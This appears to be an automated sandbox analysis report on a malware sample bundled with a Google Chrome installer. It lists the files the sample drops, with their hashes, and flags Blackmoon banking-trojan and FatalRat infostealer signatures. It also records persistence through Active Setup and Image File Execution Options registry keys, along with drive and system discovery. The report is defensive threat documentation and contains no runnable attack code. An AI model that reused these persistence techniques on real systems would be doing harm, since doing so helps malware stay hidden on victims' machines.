MD5 741211652c66a8a6790396e1875eefa9
SHA1 2ccd5653b5fc78bcc19f86b493cef11844ba7a0c
SHA256 e0945deacdb6b75ff2587dea975774b9b800747e2ee3f3917e5b40ddb87eda10
SHA512 b70f847d8ca8828c89bbb67b543950fbd514c733cf62b52ad7fc0dab7b2168fe56d1f21bef3210f5c7f563f72831455d870a5f9aa6c557f1e3543ef7329c42f9

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_el.dll

MD5 ecdd26049573614b6f41d8a102ffcf21
SHA1 5140c6cff5d596267a64df1559ac36c4e8f49e42
SHA256 a3377520f2a95b8cc06bd30e493962c07f97eebf4661a69d03efb36b2ca515c5
SHA512 933c181d7575f20480c8deadac3f3e9190081456169122216c72e7b9a04aa75612140fc37697098c7c20b77001a67966fa1661cdc9110c40634c944f833a65b1

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_da.dll

MD5 9f2e018a4f9a1d278983d0b677b91218
SHA1 c58ee1fc0d8ef9d99f85426b48c7f28f381a2c17
SHA256 d0dcdc68236eecd6b5f0b437eb92b8935741dabf1fa276a552399815af22edec
SHA512 20b74b6a9f81527d4a5fe30671d2559261fb682576f4ab04da7856280fbbaeb6af83894009c9d7cb83deeae988d0ac5ec7ec32b277b7eb45829faec2857d7014

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_cs.dll

MD5 b9033db8d0e5bf254979b0f47d10e93d
SHA1 2859de0d851b5f4fd3056e8f9015cece2436c307
SHA256 12c41c2f472b6a05fd6392e9d4f8aeb9a40840c2cbefd68b39d20f9d1d4d77ed
SHA512 52075df4ae5c86ebb0bac20604ea072a163761ae058c1473211bf4bb0eeed043cfc5a92386f876b53484cdf4e3f8a7b75d8f4bf9894c24f8c22ec23a50b70b7c

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ca.dll

MD5 39e25ba8d69f493e6f18c4ef0cf96de8
SHA1 5584a94a85d83514a46030c4165e8f7a942e63e2
SHA256 1f66ebdcaae482a201a6e0fab9c1f4501c23a0d4ad819ccd555fdca9cc7edb94
SHA512 773c995b449d64e36eb8cab174db29e29e29985bcfd714799d6b05b01bb7d4a0fc2aefaf2e27ff02b0e105fbe0d34d7efe29b193a1bc3365ec47e1f1003bed26

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_bn.dll

MD5 dafa45a82ce30cf2fd621e0a0b8c031f
SHA1 e39ed5213f9bb02d9da2c889425fab8ca6978db7
SHA256 d58e5f0fa894123de1d9b687a5b84826e095eca128ee5df8870f2db74f4233a2
SHA512 2b772ebc128eb59d636eec36583329962ead8e0a399fd56394b1244486bf815f4e033ceef74a62a9930ab2bf6ec1ba5e2d3c942183f7cb2355a716a3e2c6c7a1

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_bg.dll

MD5 c523ec13643d74b187b26b410d39569b
SHA1 46aff0297036c60f22ad30d4e58f429890d9e09d
SHA256 80505863866bcd93a7e617dd8160531401d6d05f48d595348cd321cf7d97aeac
SHA512 ecf98e29a3481b05ab23c3ff89fa3caf054b874ed15462a5e33022aacf561d8fea4a0de35cc5f7450f62110ca4ace613e0c67f543ad22eb417e79eb3ebf24ed7

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ar.dll

MD5 163695df53cea0728f9f58a46a08e102
SHA1 71b39eec83260e2ccc299fac165414acb46958bd
SHA256 f89dddda3e887385b42ea88118ba8fb1cc68fde0c07d44b851164564eb7c1ec8
SHA512 6dfb70a175097f3c96ae815a563c185136cb5a35f361288cc81570facfa1f1d28f49eaa61172d1da4982ebb76bd3e32c4de77cf97dedfb79f18113d7594d0989

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_am.dll

MD5 849bc7e364e30f8ee4c157f50d5b695e
SHA1 b52b8efa1f3a2c84f436f328decd2912efeb1b18
SHA256 f1384a25a6f40e861455c62190d794415f3e9bfca6317c214847e9535dfc3fb9
SHA512 6fd7f542a7073b3bbf1b0c200bb306b30f1b35a64a1fb013f25c7df76f63ef377d9bd736e8da2e9372f1c994785eaeedb6b60e3a0d4a4e8734c266ad61782d3b

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateComRegisterShell64.exe

MD5 be535d8b68dd064442f73211466e5987
SHA1 aa49313d9513fd9c2d2b25da09ea24d09cc03435
SHA256 c109bcb63391ac3ea93fb97fbdf3f6ed71316cacb592ef46efaea0024bc9ed59
SHA512 eb50eebeaf83be10aea8088e35a807f9001d07d17d2bc1655c3bc0cb254d0f54303348988514ba5590ebd9d3bde3f1149c3f700f62fbce63c0199ea3cfb1f638

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleCrashHandler64.exe

MD5 b659663611a4c2216dff5ab1b60dd089
SHA1 9a14392a5bdb9ea6b8c3e60224b7ff37091d48b5
SHA256 cad4aa1cf58f6b2e2aceb789d53b18418e67066ec406b2fac786cb845ef89d2b
SHA512 1065f9072cd6f1f4364f1354108f2647ee1d89f87e908a22fcd63bd3149c864c457e62268067a439d0486d8d4aa150aa984ad8ac8b51cae49014b67b80496040

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleCrashHandler.exe

MD5 a11ce10ac47f5f83b9bc980567331a1b
SHA1 63ee42e347b0328f8d71a3aa4dde4c6dc46da726
SHA256 101dbf984c4b3876defe2699d6160acbf1bb3f213e02a32f08fdcdc06821c542
SHA512 ff2f86c4061188ead1bfeebd36de7dbc312adcc95267537697f2bfcbb0c53e7c4ab0cd268cef22f0182391796c4612c97cbdc1266d9ee1960cdd2610d8c2bcb3

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateCore.exe

MD5 af51ea4d9828e21f72e935b0deae50f2
SHA1 c7fe57c2a16c9f5a5ebdd3cc0910427cba5308bd
SHA256 3575011873d0f6d49c783095dae06e6619f8f5463da578fbe284ca5d1d449619
SHA512 ec9828d0bade39754748fb53cfc7efdc5e57955198bac3c248ea9b5a9a607182bb1477819f220549a8e9eadbe6bf69a12da6c8af3761980d2dd9078eaeaa932f

memory/1388-201-0x0000000000400000-0x000000000090B000-memory.dmp

C:\Program Files\Google\Chrome\Application\133.0.6943.127\Installer\setup.exe

MD5 3eda07f3f5bd229c5a02ca9487dd152d
SHA1 b6b845c42e2316b63a61a058eb1a9714211a54ec
SHA256 cba6ac1785a616fbffb09afb29cc8b5d9a82a019d9b547338aa09b6a06905e11
SHA512 e8a0d0308f955f923753380033ebf12a795d9e3dd57e155e46ff6d709c9a4a71a24227b79a129773e6209eb1039202928a9515294833b36c218f44d787349aa6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8426aa715bdd00ab28f4267180313b8b
SHA1 ea121247cbb4de5fae01368b737a314089c857da
SHA256 8035925f02dd360737f0a54708c7dc09906f665d0c1c4a7d8852449918b82053
SHA512 1e0ec39bfe43df00e0ea970b75d5e546358b28f096d7c2d90ec563cdb01a2cbdaff6ff68bb0d8b7269761cd48597d0bb5de1af2c54348b71288c63f54cc8687d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

MD5 505a174e740b3c0e7065c45a78b5cf42
SHA1 38911944f14a8b5717245c8e6bd1d48e58c7df12
SHA256 024ae694ba44ccd2e0914c5e8ee140e6cc7d25b3428d6380102ba09254b0857d
SHA512 7891e12c5ec14b16979f94da0c27ac4629bae45e31d9d1f58be300c4b2bbaee6c77585e534be531367f16826ecbaf8ec70fc13a02beaf36473c448248e4eb911

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

MD5 b77fc97eecd8f7383464171a4edef544
SHA1 bbae26d2a7914a3c95dca35f1f6f820d851f6368
SHA256 93332c49fab1deb87dac6cb5d313900cb20e6e1ba928af128a1d549a44256f68
SHA512 68745413a681fdf4088bf8d6b20e843396ae2e92fbb97239dc6c764233a7e7b700a51548ff4d2ea86420b208b92a5e5420f08231637fbb5dbf7e12a377be3fc3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons\64.png

MD5 0aa5ac35c79f5cb38dd5fafbabf2983c
SHA1 36658f24dbb49f5ff2a19897b22071f72e523f12
SHA256 3695587d1d40ba3171aa991cb77e6c9080b550db7c3d3b52097c1723ab060f32
SHA512 fcbc8a65c4b852c848a13fa12131fa7b17b1310ad3278e78545e8334ddf199b627110bde2fc0a5e7312fad3a5f12b0db54c665d00f1feb1cf3b7c4b18e7569e7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons\48.png

MD5 5bfbb6b6a7e313f5d67a1219f7866c4a
SHA1 c49ec46ca5fb945b582c99b47a2b7c09da8f766e
SHA256 6dc4e5c4c1722173cb9d40e7edd2947c12677b12fd2fdd6e2544bda6bb456ab1
SHA512 55928faf39965083855cf6e1a8bc477560b41f3d8d8f678de7271960c6b59b7f2a256ae4e03428f86c1fc0e431370512e9c69a5631cad9e103e8978faa10ac13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons\32.png

MD5 a3a00ef924278ba60be0fffeec04995e
SHA1 69ab25402bb5ef6d99538ec8044c6edb128be0d3
SHA256 a5670fe56dbae316511d6f8c7349477c69c53dc59fe5615984eed5c8cf55a717
SHA512 fd53f2c0e8f493817f5ff5c2f9b87ffb82a11bc2b56a9798072efdf22677d2760bc489a2c8d76fdee6f65a0f4509d4bc257851811b4f720120780e796c6bc4b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1712_1657648540\Icons\128.png

MD5 654cafa7846b64b91835e202c3efca65
SHA1 4e0fa549b16a47ca9e22e0a510229f528740d51b
SHA256 956bd19ad9a62b83792bed90a6e6457e0812abb36ef85763f62883d70f65241b
SHA512 65db6e4824ee4caa38fa4ec837c2ee4290e34c8d2c5099b33720e7b6ab83997608ae8a6d47961d8506be3d23606b179cf792cc040a7c6c3f251855c294b26223

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 1b73803ecd8b858c83f030aaf637b550
SHA1 7bb64cde57924420b03f38da4d95cb4b0d113c87
SHA256 f56cab9a254f3411bb5f3415705662040a08ff6777ead282dcb36bd2c1a5128b
SHA512 9ae855343ed541f886db63353ad6ef84071adabdee05fdc8cad2234a6b21e91ad08beb8a841f456619b9a07c9c2c3bb5f515912fb304189d78162219a2077b40

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 66cb094cebf8dca17115863cd23c3547
SHA1 340c470920c30a80edfe832e373afd582aa07861
SHA256 c080b6db495e5df073e014e5bd3d34a7ef88acb5bf28cb3d24ea23119e59de19
SHA512 ed2d405f51146ae2f430d3c4e5523ef360db59494070aec84a9632135e90e9d8226d0b71d76de3c4ad11cc652399166766594b02d141f1cf2e02d1fedc3e5908

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ce3bf0cfbf684e7ef79e512ce3b3b4c6
SHA1 17a50f2b449933a266643511011cec47f50ab729
SHA256 3e3ea5d08f03f35ed36b6fc5cb408230cb4d10e2d0ee01cf38a88e4534b6198b
SHA512 87d8af2912404ccb17281078e1963fbeccbae039349184826a644c5e91e3240c9eee96b7847e069ae5f7cda11748ca52f6d00615243157f591d7a5e935fba836

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\5cf7ed12-b323-474f-9b3b-364961357b94.tmp

MD5 93f6aae11e85df57b2e4b8b4f63c45c8
SHA1 f05854aa2286a6ad786e576eccb49b8c8aa345f1
SHA256 7dd59e42f29d5333c1e285c816a30b3b9d4b600ea3ad993629a2c87577ad59eb
SHA512 913897cec0f1d8ebc5bc8d20bc56fccf21e9157aa03e562734c17f93c26741d9524940c2d6e3dff0dc7ffc0c92403f5e25b5bb7b89fa0275e7067380c1b8c952

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 262254a971f053509f427a766c0a8871
SHA1 7fe742f9537196a258757051ba1ab31e244ff285
SHA256 c40ff604199abc509f210a2dd2786e68b676684d91ecaa345c7ee900c0c7915e
SHA512 a510c251cf5012188e38abdf284079b57e132d8a63a095a7695a76313bfb8829ea445fc3e0712fa58e3143f503c22bf9ac53a87b1f600c2e7f3be836451def9b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ab09fbc4df6052221e0ecfd98e8dcec9
SHA1 df2ab1e16493009d3bee4c99f625d52cf0126915
SHA256 aceb5508018c9557203b10112eef41cd76c8eaa33bad5485dc9cea416fb41a54
SHA512 0a9d747ed4ac839c0a28f9df9e6e4ee08f41f976b5dcfc71510517d41d4f1994e47e3afefd11f2ca397935500e9351db91da2180b561c54d0456de3851c322b3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 2033081fb0bbe4d85e918c7a062cfae0
SHA1 c258d73446aa30b38e4ea1b2f9bdeeca26ced9ed
SHA256 a66cb240ffe4be18107626196f594154e67d484845f849062760871ea7d3878e
SHA512 fdc8bb13b1a54f113826d8713fa1cf1eb5588b23fd27eb4a1007b09b50ccdf49407cd6559faf1975e55ce92aaa7dbcaacb65feace9fc954cb14eeda76500f19a

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\manifest.json

MD5 01c878f43569459b9671819276fc381a
SHA1 c04140758f7fd681cc55acf2b02d988f13aef25c
SHA256 6000afa1b02202ed4821c24bbdd88cea539c2cb4d0ef7033bd5d3e6b4ddee430
SHA512 f80b39516cedd3108676e4c41c19fb7a6d05f2a92ffcbb4ea595f111dfd5e4d14dc7de5c3c871e0fe5d90d40c6c45a8c646c324329ad7aa8fd37c1d4d0810e8f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.54.0\Filtering Rules

MD5 7c91e14b081c346267e1b1761c029f1c
SHA1 40d2665fd0042a5aaa3b8c7c451813d6c7005ead
SHA256 fd3ade759bd847f845fe201167de1f53e53a2275631303952f1ac4d7ab5b19dc
SHA512 89a269667034fc15e7ecdc3aec70375949c1ae65a944cb3d762909152c8db1c4b163aa2162698a0345889154e248b5a70b7c93182f5a853529eefd889926233d

Analysis: behavioral1

Detonation Overview

Submitted 2025-02-21 23:06

Reported 2025-02-21 23:10

Platform win7-20250207-en

Max time kernel 149s

Max time network 148s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch

Signatures

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\109.0.5414.120\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ms.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_id.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_el.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ja.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\icudtl.dat C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\fr.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\gu.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\VisualElements\SmallLogoDev.png C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\109.0.5414.120\Installer\setup.exe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\sv.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\vulkan-1.dll C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_sl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_cs.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\chrome_100_percent.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\en-GB.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_uk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\sl.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Google\Temp\GUTF134.tmp C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ur.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_en-GB.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\th.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_it.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ta.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleCrashHandler.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hr.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\gui7081.tmp C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\nl.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_fr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_pt-PT.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_pl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sl.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\fi.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\vi.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
